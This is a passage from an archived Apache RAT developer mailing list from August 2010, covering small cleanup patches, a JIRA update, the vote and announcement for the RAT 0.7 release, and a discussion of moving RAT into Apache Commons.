tests=SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO samaflost.de) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 07 Aug 2010 21:04:56 +0000 Received: from localhost (localhost.localdomain [161.129.204.104]) by samaflost.de (Postfix) with ESMTP id 6F18C28985D1 for <[email protected]>; Sat, 7 Aug 2010 23:04:35 +0200 (CEST) Received: from samaflost.de ([161.129.204.104]) by localhost (v35516.1blu.de [161.129.204.104]) (amavisd-new, port 10024) with ESMTP id TPbMpY203Azh for <[email protected]>; Sat, 7 Aug 2010 23:04:33 +0200 (CEST) Received: by samaflost.de (Postfix, from userid 1000) id 4C40A28985D2; Sat, 7 Aug 2010 23:04:33 +0200 (CEST) From: Stefan Bodewig <[email protected]> To: [email protected] Subject: Re: [PATCH] Remove unneeded imports References: <[email protected]> X-Draft-From: ("nnfolder:mail.rat" 1029) Date: Sat, 07 Aug 2010 23:04:32 +0200 In-Reply-To: <[email protected]> (Hyrum Wright's message of "Thu, 5 Aug 2010 09:58:08 -0500") Message-ID: <[email protected]> User-Agent: Gnus/5.13 (Gnus v5.13) Emacs/23.2 (gnu/linux) MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii On 2010-08-05, Hyrum Wright wrote: > Another quite trivial patch to remove a couple of unneeded import > noise from RAT. committed as svn revision 983309 Thanks Stefan From [email protected] Mon Aug 09 04:30:42 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 67706 invoked from network); 9 Aug 2010 04:30:42 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 9 Aug 2010 04:30:42 -0000 Received: (qmail 383 invoked by uid 500); 9 Aug 2010 04:30:42 -0000 Delivered-To: [email protected] Received: (qmail 276 invoked by uid 500); 9 Aug 2010 04:30:40 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 260 invoked by uid 99); 9 Aug 2010 04:30:39 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 09 Aug 2010 04:30:39 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO thor.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 09 Aug 2010 04:30:39 +0000 Received: from thor (localhost [161.129.204.104]) by thor.apache.org (8.13.8+Sun/8.13.8) with ESMTP id o794UIos006449 for <[email protected]>; Mon, 9 Aug 2010 04:30:18 GMT Message-ID: <11883708.228001281328218912.JavaMail.jira@thor> Date: Mon, 9 Aug 2010 00:30:18 -0400 (EDT) From: "Stefan Bodewig (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Updated: (RAT-46) PHP Header In-Reply-To: <1404187306.1240397027431.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 [ https://issues.apache.org/jira/browse/RAT-46?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Stefan Bodewig updated RAT-46: ------------------------------ Fix Version/s: 0.8 (was: 0.7) > PHP Header > ---------- > > Key: RAT-46 > URL: https://issues.apache.org/jira/browse/RAT-46 > Project: RAT > Issue Type: Improvement > Components: license-meta-data > Affects Versions: 0.6 > Reporter: Robert Burrell Donkin > Fix For: 0.8 > > > Support for PHP Group Header -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Mon Aug 09 14:59:58 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 65819 invoked from network); 9 Aug 2010 14:59:58 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 9 Aug 2010 14:59:58 -0000 Received: (qmail 89070 invoked by uid 500); 9 Aug 2010 14:59:58 -0000 Delivered-To: [email protected] Received: (qmail 89018 invoked by uid 500); 9 Aug 2010 14:59:57 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 89010 invoked by uid 99); 9 Aug 2010 14:59:56 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 09 Aug 2010 14:59:56 +0000 X-ASF-Spam-Status: No, hits=0.7 required=10.0 tests=RCVD_IN_DNSWL_NONE,SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO mail-qw0-f47.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 09 Aug 2010 14:59:49 +0000 Received: by qwg8 with SMTP id 8so7537342qwg.6 for <[email protected]>; Mon, 09 Aug 2010 07:59:27 -0700 (PDT) MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id na8mr7226775qcb.227.1281365967285; Mon, 09 Aug 2010 07:59:27 -0700 (PDT) Sender: [email protected] Received: by 161.129.204.104 with HTTP; Mon, 9 Aug 2010 07:59:27 -0700 (PDT) X-Originating-IP: [161.129.204.104] Date: Mon, 9 Aug 2010 09:59:27 -0500 X-Google-Sender-Auth: 3aNeZv_1Rp3CIkkpLvt5ERsSE-4 Message-ID: <[email protected]> Subject: [PATCH] Remove unused function From: "Hyrum K. Wright" <[email protected]> To: rat-dev <[email protected]> Content-Type: multipart/mixed; boundary=90e6ba5bb99f4eae91048d65431f --90e6ba5bb99f4eae91048d65431f Content-Type: text/plain; charset=ISO-8859-1 Another trivial cleanup patch, this one removing a completely unused function. -Hyrum --90e6ba5bb99f4eae91048d65431f Content-Type: text/plain; charset=US-ASCII; name="unused-function.patch.txt" Content-Disposition: attachment; filename="unused-function.patch.txt" Content-Transfer-Encoding: base64 X-Attachment-Id: f_gcng7and0 SW5kZXg6IGFwYWNoZS1yYXQtdGFza3Mvc3JjL21haW4vamF2YS9vcmcvYXBhY2hlL3JhdC9hbnR0 YXNrcy9SZXNvdXJjZUNvbGxlY3Rpb25Db250YWluZXIuamF2YQo9PT09PT09PT09PT09PT09PT09 PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09Ci0tLSBhcGFj aGUtcmF0LXRhc2tzL3NyYy9tYWluL2phdmEvb3JnL2FwYWNoZS9yYXQvYW50dGFza3MvUmVzb3Vy Y2VDb2xsZWN0aW9uQ29udGFpbmVyLmphdmEJKHJldmlzaW9uIDk4MzY2NikKKysrIGFwYWNoZS1y YXQtdGFza3Mvc3JjL21haW4vamF2YS9vcmcvYXBhY2hlL3JhdC9hbnR0YXNrcy9SZXNvdXJjZUNv bGxlY3Rpb25Db250YWluZXIuamF2YQkod29ya2luZyBjb3B5KQpAQCAtNjMsMTAgKzYzLDYgQEAK IAogICAgICAgICBwcml2YXRlIFJlc291cmNlIHJlc291cmNlOwogICAgICAgICBwcml2YXRlIGZp bmFsIE1ldGFEYXRhIG1ldGFEYXRhID0gbmV3IE1ldGFEYXRhKCk7Ci0gICAgICAgIAotICAgICAg ICBwdWJsaWMgUmVzb3VyY2UgZ2V0UmVzb3VyY2UoKSB7Ci0gICAgICAgICAgICByZXR1cm4gcmVz b3VyY2U7Ci0gICAgICAgIH0KIAogICAgICAgICBwdWJsaWMgdm9pZCBzZXRSZXNvdXJjZShSZXNv dXJjZSByZXNvdXJjZSkgewogICAgICAgICAgICAgdGhpcy5yZXNvdXJjZSA9IHJlc291cmNlOwo= --90e6ba5bb99f4eae91048d65431f-- From [email protected] Mon Aug 09 15:21:49 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 84067 invoked from network); 9 Aug 2010 15:21:49 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 9 Aug 2010 15:21:49 -0000 Received: (qmail 33086 invoked by uid 500); 9 Aug 2010 15:21:49 -0000 Delivered-To: [email protected] Received: (qmail 33032 invoked by uid 500); 9 Aug 2010 15:21:48 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 33024 invoked by uid 99); 9 Aug 2010 15:21:48 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 09 Aug 2010 15:21:48 +0000 X-ASF-Spam-Status: No, hits=0.7 required=10.0 tests=RCVD_IN_DNSWL_NONE,SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO mail-qw0-f47.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 09 Aug 2010 15:21:40 +0000 Received: by qwg8 with SMTP id 8so7558831qwg.6 for <[email protected]>; Mon, 09 Aug 2010 08:21:19 -0700 (PDT) MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id fr42mr7261336qcb.258.1281367278917; Mon, 09 Aug 2010 08:21:18 -0700 (PDT) Sender: [email protected] Received: by 161.129.204.104 with HTTP; Mon, 9 Aug 2010 08:21:18 -0700 (PDT) X-Originating-IP: [161.129.204.104] Date: Mon, 9 Aug 2010 10:21:18 -0500 X-Google-Sender-Auth: r6O05kqE6VB8VBoUAWf8TO6yETs Message-ID: <[email protected]> Subject: [PATCH] Update release notes for 0.7 From: "Hyrum K. Wright" <[email protected]> To: rat-dev <[email protected]> Content-Type: multipart/mixed; boundary=0050450298f07c97ef048d6591b3 --0050450298f07c97ef048d6591b3 Content-Type: text/plain; charset=ISO-8859-1 I know this is a bit late, given we're already voting on (released?) 0.7, but this is an additional feature which is included in the release. -Hyrum --0050450298f07c97ef048d6591b3 Content-Type: text/plain; charset=US-ASCII; name="release-notes-update.patch.txt" Content-Disposition: attachment; filename="release-notes-update.patch.txt" Content-Transfer-Encoding: base64 X-Attachment-Id: f_gcngyoor0 SW5kZXg6IFJFTEVBU0VfTk9URVMudHh0Cj09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09 PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0KLS0tIFJFTEVBU0VfTk9URVMudHh0 CShyZXZpc2lvbiA5ODI3MTQpCisrKyBSRUxFQVNFX05PVEVTLnR4dAkod29ya2luZyBjb3B5KQpA QCAtMTQsNiArMTQsNyBAQAogICAgICogUkFULTYzIGFudC10YXNrLWV4YW1wbGVzLnhtbCBoYXMg YW4gd3JvbmcgdXJpIGluIHRoZSAtdHlwZWRlZiBhbnQgdGFyZ2V0CiAgICAgKiBSQVQtNzAgTWlz c2luZyBjbG9zaW5nIGh0bWwgdGFnIGluIGdlbmVyYXRlZCByZXBvcnQgYnkKICAgKiBJbXByb3Zl bWVudDoKKyAgICAqIFJBVC0xNyBTdXBwb3J0IHRoZSB1c2Ugb2YgYXJjaGl2ZXMgYXMgaW5wdXQK ICAgICAqIFJBVC0zMCAvIFJBVC03NiBTdXBwb3J0IGF1dG9tYXRpYyBhZGRpdGlvbiBvZiBsaWNl bnNlIGhlYWRlcnMKICAgICAqIFJBVC01MiBNZXJnZSBJbiBSYXQgT3V0cHV0IFNlbWFudGljcwog ICAgICogUkFULTU2IENvbW1vbnMgSU8gV2lsZGNhcmQgRXhjbHVkZXMK --0050450298f07c97ef048d6591b3-- From [email protected] Mon Aug 09 22:24:20 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 88619 invoked from network); 9 Aug 2010 22:24:20 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 9 Aug 2010 22:24:20 -0000 Received: (qmail 24776 invoked by uid 500); 9 Aug 2010 22:24:20 -0000 Delivered-To: [email protected] Received: (qmail 24722 invoked by uid 500); 9 Aug 2010 22:24:20 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 24706 invoked by uid 99); 9 Aug 2010 22:24:19 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 09 Aug 2010 22:24:19 +0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=FREEMAIL_FROM,RCVD_IN_DNSWL_NONE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-qy0-f182.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 09 Aug 2010 22:24:13 +0000 Received: by mail-qy0-f182.google.com with SMTP id 32so9767754qyk.6 for <multiple recipients>; Mon, 09 Aug 2010 15:23:53 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:received:date:message-id :subject:from:to:content-type; bh=bjsWKj4p2Blpi3+LM2C8eASWpX0dJ3R695RlqN8Xzjg=; b=uGsfK/BapeX0fR0dEKge1/mtb/BqWOnWd1Ovq7Fgvy7vQsA9iVsQtNb171ljpmhvB0 75JKkFRA0aN0OJKgYl7rWbWLqTPPTBcTi0dWGHP/c4lqMcctPe4Ug6j6TjwoaMFeRm6M rx0L1aZYQVdA2nJhvSTqS9OsPhqGtRTwP97UM= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:date:message-id:subject:from:to:content-type; b=mb7NG1wOYYl7vf29H2WckoZMZUoJdAtI0WPBKtrkbpZJng8WYooRqnKt5vUs58G4mM sI0N1kGhOsEu5HPaKgj6+DV63C8f+NhB0j/xG8H6fCszcNR43FQ1gsVmnppFwUuBuiWv Ns+p0GFZ9IPf7LnBH6438AHXT5pCpcEZsVBCo= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id io18mr1288390qcb.171.1281392632899; Mon, 09 Aug 2010 15:23:52 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Mon, 9 Aug 2010 15:23:52 -0700 (PDT) Date: Tue, 10 Aug 2010 00:23:52 +0200 Message-ID: <[email protected]> Subject: [RESULT] Release Apache RAT 0.7 From: Jochen Wiedmann <[email protected]> To: general-incubator <[email protected]>, [email protected] Content-Type: text/plain; charset=UTF-8 Passed with 5* +1 (Kevan Miller, Senaka Fernando, Ant Elder, Stefan Bodewig, Gavin McDonald), and no =0, or -1 votes. I'll proceed with publishing the files. Jochen -- I Am What I Am And That's All What I Yam (Popeye) From [email protected] Tue Aug 10 10:06:16 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 8386 invoked from network); 10 Aug 2010 10:06:16 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 10 Aug 2010 10:06:16 -0000 Received: (qmail 72497 invoked by uid 500); 10 Aug 2010 10:06:16 -0000 Delivered-To: [email protected] Received: (qmail 72433 invoked by uid 500); 10 Aug 2010 10:06:14 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 72418 invoked by uid 99); 10 Aug 2010 10:06:13 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 10 Aug 2010 10:06:13 +0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=FREEMAIL_FROM,RCVD_IN_DNSWL_NONE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-qw0-f47.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 10 Aug 2010 10:06:05 +0000 Received: by qwg8 with SMTP id 8so8273324qwg.6 for <multiple recipients>; Tue, 10 Aug 2010 03:05:44 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:received:date:message-id :subject:from:to:content-type; bh=sWSmFU+2oAlf8W607ObUTxFoHH2tTp6pwOO+v6deWFM=; b=ubLVRwnWSmfWvjQA+idQi8shs100qu1UcXSBVOkeGyKzH/s8y09NkC7UOVpKxW+78x p65IsYYUdV3662x2VWByiAmrFvefZjdZhNTqedDh4NHSZ4NRdXxM9vIJLK+UA+fJspMH CbZevSZS2/xKwAgxz/o2AjpcskADc+eJ/76n8= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:date:message-id:subject:from:to:content-type; b=ilvynBO6yQub2kaR06NJ0udiUsMnWVyMg8NtMIXSXBaNL06XLPEsEBPAakfFRo//di HrkM3giMxcsY9+a7qYl7+DNEad62EugaOfdai7oYweXVFYxJ58Gk+nhbiQFYKFjHzlmd 6w/EpzTi0Md7m0aCCLrzcg6Lry/fR6Q2Nwl8g= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id if9mr8157804qcb.9.1281434744575; Tue, 10 Aug 2010 03:05:44 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Tue, 10 Aug 2010 03:05:44 -0700 (PDT) Date: Tue, 10 Aug 2010 12:05:44 +0200 Message-ID: <[email protected]> Subject: Announce: Apache RAT 0.7 From: Jochen Wiedmann <[email protected]> To: general-incubator <[email protected]>, [email protected] Content-Type: text/plain; charset=UTF-8 X-Virus-Checked: Checked by ClamAV on apache.org Hi, on behalf of the Apache RAT team, I'd like to announce the availability of Apache RAT 0.7. This is a feature release with several bug fixes and minor improvements over its predecessor, Apache RAT 0.6. An upgrade is recommended. For details on Apache RAT, see http://incubator.apache.org/rat The binary and source distribution are available from http://www.apache.org/dyn/closer.cgi/incubator/rat/ The Maven repository has been updated, and a new version of the Maven plugin is available as well. A new version of the Ant tasks is contained in the distribution. The following changes have been made in Apache RAT 0.7: - Add support for Python scripts, C source files, Unix shell scripts (.sh) and Windows batch files (.bat) (RAT-68) - Allow Ant task to output report as XML. (RAT-73) - Allow users to specify a custom XSLT stylesheet for reports (RAT-74, and RAT-75) - Optionally auto-add headers to source files. (RAT-76) Jochen From [email protected] Tue Aug 10 10:40:54 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 17761 invoked from network); 10 Aug 2010 10:40:54 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 10 Aug 2010 10:40:54 -0000 Received: (qmail 15577 invoked by uid 500); 10 Aug 2010 10:40:54 -0000 Delivered-To: [email protected] Received: (qmail 15524 invoked by uid 500); 10 Aug 2010 10:40:52 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 15501 invoked by uid 99); 10 Aug 2010 10:40:51 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 10 Aug 2010 10:40:51 +0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=FREEMAIL_FROM,RCVD_IN_DNSWL_NONE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-qy0-f175.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 10 Aug 2010 10:40:43 +0000 Received: by qyk11 with SMTP id 11so3127334qyk.6 for <multiple recipients>; Tue, 10 Aug 2010 03:40:22 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:received:date:message-id :subject:from:to:content-type; bh=iOPHQVa+uVqnz1B2W9SBSIlnqMiucUBAD00hJ7GsGwk=; b=vPE7f4qtIlATP3Jt27jsQGNFQqJBZIg7POaP+tdRdlK3WcuTNs/6WvWHAunrPo15IY GjWlT3L5a1wkIzCA3Eq48CiOcJk9xJNaOE/uKHOjRf3H8nyMEyYpwd5av2WYu5Zaojnb 54Dg9v9Y7eHuyQV1+rTmJPQmQs8qwZqmOoOLk= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:date:message-id:subject:from:to:content-type; b=OxQUQoCiAMrq3AzmBfVdYNZcCPMycIynZXm6CHHzmnCukLF7sYzZaO89UjpcYITxA0 UX/aFMUGxBmoaIbjsPhFvv1RyIM7Wrm3tjm7ugL/wjU02JmscWp6pZGMO4bURKF9SM57 gy+qYQe7C/VStwmv8Z3QimPb7SHr5CWtow9dY= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id bz18mr8222499qcb.43.1281436822258; Tue, 10 Aug 2010 03:40:22 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Tue, 10 Aug 2010 03:40:22 -0700 (PDT) Date: Tue, 10 Aug 2010 12:40:22 +0200 Message-ID: <[email protected]> Subject: Future of RAT From: Jochen Wiedmann <[email protected]> To: general-incubator <[email protected]>, [email protected], Apache Commons Developers List <[email protected]> Content-Type: text/plain; charset=UTF-8 X-Virus-Checked: Checked by ClamAV on apache.org Hi, having just published a release of Apache RAT with the "-incubating" label, I'd though it is time to discuss the future of RAT. RAT is an incubator project since 18 months. It is not an overly busy project: The occasional feature request, which is handled, a bug report from time to time, and so on. OTOH, it definitely lives: People are interested and, what's more, it is very widely adopted by all Java projects I am aware of and perhaps even by a few non-Java projects. If there will ever be a migration to a new license like ASL 3 or a another change of the header policy, then RAT will likely play a very important part in the process. Even now, the RAT report is carefully studied as part of every release vote. (Funnily, RAT is very rarely used to inspect itself, because so far I didn't find a possibility to run a previous version of the RAT Maven plugin as part of a build. In fact, RAT is the only project I am aware of, which doesn't publish a RAT report. :-) IMO, RAT could very well leave the incubator. It's 10 or so committers [1] are all part of an organization called ASF since years, so you might question the diversity, but I don't believe anyone will actually do that. ;-) The source code has been developed under ASL and by Apache committers right from the start, so licensing was never an issue. The question is: What's the target? RAT is way too small for an independent project. And I cannot imagine anybody of the current committers writing board reports. To me, a Rat TLP is no option. So we have the second possibility: Put it under the hat of another TLP. The only one that comes to my mind is the Apache Commons project. But Commons would be an excellent choice: Most, or even all of the RAT committers are Commons committers as well. Commons was one of the drivers for integration of RAT into every release build. I admit that I wouldn't like to change the package name or the Maven group ID again, but either Commons developers could accept that exception from the rule or I'd force myself to do the required changes. WDYT? Jochen [1] http://incubator.apache.org/rat/team-list.html From [email protected] Tue Aug 10 10:55:03 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 21948 invoked from network); 10 Aug 2010 10:55:02 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 10 Aug 2010 10:55:02 -0000 Received: (qmail 36012 invoked by uid 500); 10 Aug 2010 10:55:02 -0000 Delivered-To: [email protected] Received: (qmail 35332 invoked by uid 500); 10 Aug 2010 10:55:00 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 35314 invoked by uid 99); 10 Aug 2010 10:54:59 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 10 Aug 2010 10:54:59 +0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=FREEMAIL_FROM,RCVD_IN_DNSWL_NONE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-qw0-f47.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 10 Aug 2010 10:54:51 +0000 Received: by qwg8 with SMTP id 8so8301096qwg.6 for <multiple recipients>; Tue, 10 Aug 2010 03:54:30 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:received:in-reply-to :references:date:message-id:subject:from:to:content-type; bh=sn+fZ97EqKRJoUg7LYuNqlTBmQm4CdBxvqWZoe1/3s4=; b=lYA1zibDBHbqn38UrbyuM+QF2ilfh6RFLLLSpRQwuHpg9sLpduELpCwvbHS1/NzsGG fLwoGgxMnA6bPwmM5x9JqdDnscxIfDLEeLESl7dihH1GLKKC0yyLLhpLysdsIN4IHuXO VZErJIQfaEpx/GUvLGGjl187NOXf7rUlrPkvY= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :content-type; b=tRIy6vtnksCfKjf4gkBe8xonPAONbu7QMXfccXDHvPUOtWVMKPO9Wmc6SHoEGMPlUi Aoz4bR3RTTjO7ij/RitDjWqyD/Yju579cyxeFhA5sXDzq66THgdq/Uxe6781SfBuxNvV wHi4p+2uAr6/sJe3dASlrOy+gYcoQC4Ff/cC8= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id ka4mr8205651qcb.12.1281437670189; Tue, 10 Aug 2010 03:54:30 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Tue, 10 Aug 2010 03:54:30 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> Date: Tue, 10 Aug 2010 12:54:30 +0200 Message-ID: <[email protected]> Subject: Re: Future of RAT From: Jochen Wiedmann <[email protected]> To: general-incubator <[email protected]>, [email protected], Apache Commons Developers List <[email protected]> Content-Type: text/plain; charset=UTF-8 X-Virus-Checked: Checked by ClamAV on apache.org Forgot one possible issue: Currently, RAT has its own mailing lists, which would be unusual for Commons. My personal choice would be to leave this as it is, but that's of course also subject to discussion. Jochen On Tue, Aug 10, 2010 at 12:40 PM, Jochen Wiedmann <[email protected]> wrote: > Hi, > > having just published a release of Apache RAT with the "-incubating" > label, I'd though it is time to discuss the future of RAT. RAT is an > incubator project since 18 months. It is not an overly busy project: > The occasional feature request, which is handled, a bug report from > time to time, and so on. OTOH, it definitely lives: People are > interested and, what's more, it is very widely adopted by all Java > projects I am aware of and perhaps even by a few non-Java projects. If > there will ever be a migration to a new license like ASL 3 or a > another change of the header policy, then RAT will likely play a very > important part in the process. Even now, the RAT report is carefully > studied as part of every release vote. (Funnily, RAT is very rarely > used to inspect itself, because so far I didn't find a possibility to > run a previous version of the RAT Maven plugin as part of a build. In > fact, RAT is the only project I am aware of, which doesn't publish a > RAT report. :-) > > IMO, RAT could very well leave the incubator. It's 10 or so committers > [1] are all part of an organization called ASF since years, so you > might question the diversity, but I don't believe anyone will actually > do that. ;-) The source code has been developed under ASL and by > Apache committers right from the start, so licensing was never an > issue. > > The question is: What's the target? RAT is way too small for an > independent project. And I cannot imagine anybody of the current > committers writing board reports. To me, a Rat TLP is no option. So we > have the second possibility: Put it under the hat of another TLP. The > only one that comes to my mind is the Apache Commons project. > > But Commons would be an excellent choice: Most, or even all of the RAT > committers are Commons committers as well. Commons was one of the > drivers for integration of RAT into every release build. I admit that > I wouldn't like to change the package name or the Maven group ID > again, but either Commons developers could accept that exception from > the rule or I'd force myself to do the required changes. > > WDYT? > > Jochen > > > [1] http://incubator.apache.org/rat/team-list.html > -- I Am What I Am And That's All What I Yam (Popeye) From [email protected] Tue Aug 10 10:56:12 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 23204 invoked from network); 10 Aug 2010 10:56:12 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 10 Aug 2010 10:56:12 -0000 Received: (qmail 38626 invoked by uid 500); 10 Aug 2010 10:56:12 -0000 Delivered-To: [email protected] Received: (qmail 38581 invoked by uid 500); 10 Aug 2010 10:56:11 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 38570 invoked by uid 99); 10 Aug 2010 10:56:10 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 10 Aug 2010 10:56:10 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO aegis.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 10 Aug 2010 10:56:08 +0000 Received: from aegis.apache.org (localhost 